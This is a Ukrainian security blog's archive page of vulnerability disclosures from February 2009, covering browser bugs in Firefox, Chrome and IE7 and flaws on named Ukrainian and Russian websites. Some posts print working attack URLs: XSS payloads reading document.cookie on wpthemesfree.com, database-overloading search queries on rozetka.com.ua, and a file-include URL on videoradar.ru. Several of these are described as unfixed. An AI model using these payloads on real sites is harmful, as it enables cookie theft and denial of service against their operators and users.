Архів для категорії 'Уразливості'

Charset Inheritance уразливість в Mozilla Firefox 3

23:56 13.02.2009

Раніше я писав про Charset Inheritance уразливість в Internet Explorer 6 та Google Chrome, яка призводила до Cross-Site Scripting з використанням успадкованої кодової сторінки. Тоді я перевірив дану атаку в Firefox 3.0.1 і він виявився невразливим. Але після того, як виявилося, що Мозіла виправила в Firefox Charset Remembering уразливість (внесши зміни в роботу з UTF-7), я вирішив перевірити можливість появи даної уразливості в нових браузерах Мозіли.

В лютому, 02.02.2009 в мене виникла підозра, що Mozilla Firefox вразливий до Charset Inheritance. Яку я сьогодні перевірив і підтвердив, що Firefox має дану уразливість, яка дозволяє проводити XSS атаки (зокрема, з використанням UTF-7 кодування).

Як і у випадку Google Chrome, дана уразливість працює в Firefox лише з одного домена - Same Domain Charset Inheritance уразливість. Тому для атаки потрібно мати можливість розмістити html-код з фреймом/іфреймом на тому самому домені (наприклад, через аплоадер).

Уразливі версії Mozilla Firefox 3.0.2 - 3.0.6. Версія Firefox 3.0.1 та всі попередні версії не вразливі. Також можуть бути вразливими версії Mozilla Firefox 2.0.0.x, що вийшли після Firefox 3.0.2.

Нова уразливість на www.banner.kiev.ua

20:32 13.02.2009

13.08.2008

У листопаді, 25.11.2007, я знайшов нову Cross-Site Scripting уразливість на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.banner.kiev.ua.

Детальна інформація про уразливість з’явиться пізніше.

13.02.2009

XSS:

Дана уразливість досі не виправлена.

Уразливості на www.delfi.ua

23:55 12.02.2009

У березні, 12.03.2008, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на проекті http://www.delfi.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.delfi.ua.

Insufficient Anti-automation:

http://www.delfi.ua/news/daily/economy/article.php?id=336761

На сторінках новин в формі коментарю немає захисту від автоматизованих запитів (капчі).

Insufficient Anti-automation:

http://www.delfi.ua/note.php?id=336761&url=1

На сторінці відправки повідомлення редакції немає капчі.

Insufficient Anti-automation + Abuse of Functionality:

http://www.delfi.ua/news/daily/economy/article.php?id=336761&s2f=1

На сторінках відправки повідомлення з лінкою на новину немає капчі. А враховуючи, що всі основні поля доступні для модифікації, даний функціонал сайта може використовуватися для масової розсилки спаму.

Добірка уразливостей

16:07 12.02.2009

В даній добірці уразливості в веб додатках:

  • aliboard Beta Upload Shell From ControlPanel (деталі)
  • Mercury v1.1.5 Send Message Cross-Site Scripting (деталі)
  • Simple Machines Forum “SMF Shoutbox” Mod Persistent XSS (деталі)
  • RFI vulnerability in sandbox 1.4.1 (деталі)
  • Default Multiple Joomla! Component com_rapidrecipe “user_id=” Remote SQL Inj (деталі)
  • SQL Injection vulnerability in Vwar 1.5.0 (деталі)
  • Skype skype4com URI Handler Remote Heap Corruption Vulnerability (деталі)
  • Level-One WBR-3460A Grants Root Access (деталі)
  • PKs Movie Database version 3.0.3 (SQL/XSS) (деталі)
  • Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit (деталі)

DoS уразливість в Internet Explorer 7

23:56 11.02.2009

У вересні, 29.09.2008, я виявив Denial of Service уразливість в Internet Explorer 7. Уразливість подібна до DoS в браузерах Firefox, Opera та Chrome і до якої IE6 не був вразливий, але, як я перевірив, до неї вразливий IE7.

Дану атаку я назвав DoS через друк (printing DoS attack).

DoS:

IE DoS Exploit.html

При запуску експлоіта браузер блокується - він не зависає, але ним стає неможливо користуватися і його можна лише закрити (через Task Manager).

Уразлива версія Internet Explorer 7 (7.0.6000.16711) і попередні версії.

Уразливості на www.rozetka.com.ua

19:24 11.02.2009

11.08.2008

У листопаді, 21.11.2007, я знайшов Denial of Service та Cross-Site Scripting уразливості на проекті http://www.rozetka.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів останній раз я писав про уразливості на mister-rich.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.02.2009

Уразливості стосуються обох доменів http://www.rozetka.com.ua і http://rozetka.kiev.ua.

DoS:

В пошуку по сайту запит “1″ призводить до перенавантаження БД. І чим глибші результати пошуку, тім більше навантаження.

http://www.rozetka.com.ua/index.php?page=search&lang=ru&search_text=1
http://www.rozetka.com.ua/index.php?page=search&lang=ru&search_text=1&pno=300
http://www.rozetka.com.ua/index.php?page=search&lang=ru&search_text=1&pno=990

XSS:

Дані уразливості досі не виправлені.

Уразливості на www.videoradar.ru

23:59 10.02.2009

У березні, 30.03.2008, я знайшов Cross-Site Scripting та Local File Include уразливості на проекті http://www.videoradar.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.videoradar.ru.

XSS:

LFI:

http://www.videoradar.ru/?op=1&act=1

В результаті інклюдиться файл Project_1_1.php.

Добірка уразливостей

16:21 10.02.2009

В даній добірці уразливості в веб додатках:

Ненадійне оновлення в Google Chrome

23:53 09.02.2009

Одразу після виходу Google Chrome, як почав активно його досліджувати, 09.09.2008, я запідозрив, що даний браузер має уразливість пов’язану з ненадійним оновленням. І ось лише сьогодні я знайшов час, щоб це перевірити, і підтвердив наявність даної уразливості в браузері.

Представляю нову дірку в Google Chrome, яка полягає в тому, що браузер має ненадійне оновлення. Chrome оновлюється через незашифроване з’єднання - як перевірка наявності оновлень, так і безпосередньо їх викачка відбувається через http, а не через https (тобто без використання SSL). Що може бути використано зловмисниками для проведення MITM атаки, з метою виконання коду, або підміни браузера на шкідливий додаток (в тому числі на версію Chrome з вбудованим трояном).

Цю ситуацію посилює те, що апдейт в Хромі автоматичний, який не можна відключити в браузері (тільки в налаштуваннях ОС). І користувач може й не запідозрити, коли на нього проведуть MITM атаку і замінять браузер на версію з трояном. Тому варто зробити, щоб ця функція мала налаштування (і виконувалася через SSL).

До речі, раніше я писав про те, що доповнення до Firefox, Yahoo і Google можуть використовуватися для атаки на користувачів (зокрема в даній новині йшлося про Google Toolbar і Google Browser Sync), а також про проблеми з оновленнями в багатьох розширеннях Mozilla та Firefox. Про це повідомлялося ще в 2007 році й того ж року Мозіла виправила дану уразливість в своєму браузері (тоді ще в Firefox 2). А Firefox 3 з самого початку виконує оновлення тільки через SSL.

Уразлива версія Google Chrome 1.0.154.48 та попередні версії.

Уразливості на wpthemesfree.com

20:14 09.02.2009

01.08.2008

У листопаді, 21.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://wpthemesfree.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

09.02.2009

XSS:

XSS (IE):

При кліку на лінці “Add to Favorites”. Це strictly social XSS.

http://wpthemesfree.com/index.php?order=');alert(document.cookie);//
http://wpthemesfree.com/index.php?page=');alert(document.cookie);//
http://wpthemesfree.com/index.php?category=');alert(document.cookie);//
http://wpthemesfree.com/index.php?property=');alert(document.cookie);//
http://wpthemesfree.com/index.php?');alert(document.cookie);//

Всі сторінки на сайті, що мають лінку “Add to Favorites”, вразливі до даної XSS.

Якщо strictly social XSS вже виправлені, то всі reflected XSS уразливості досі не виправлені.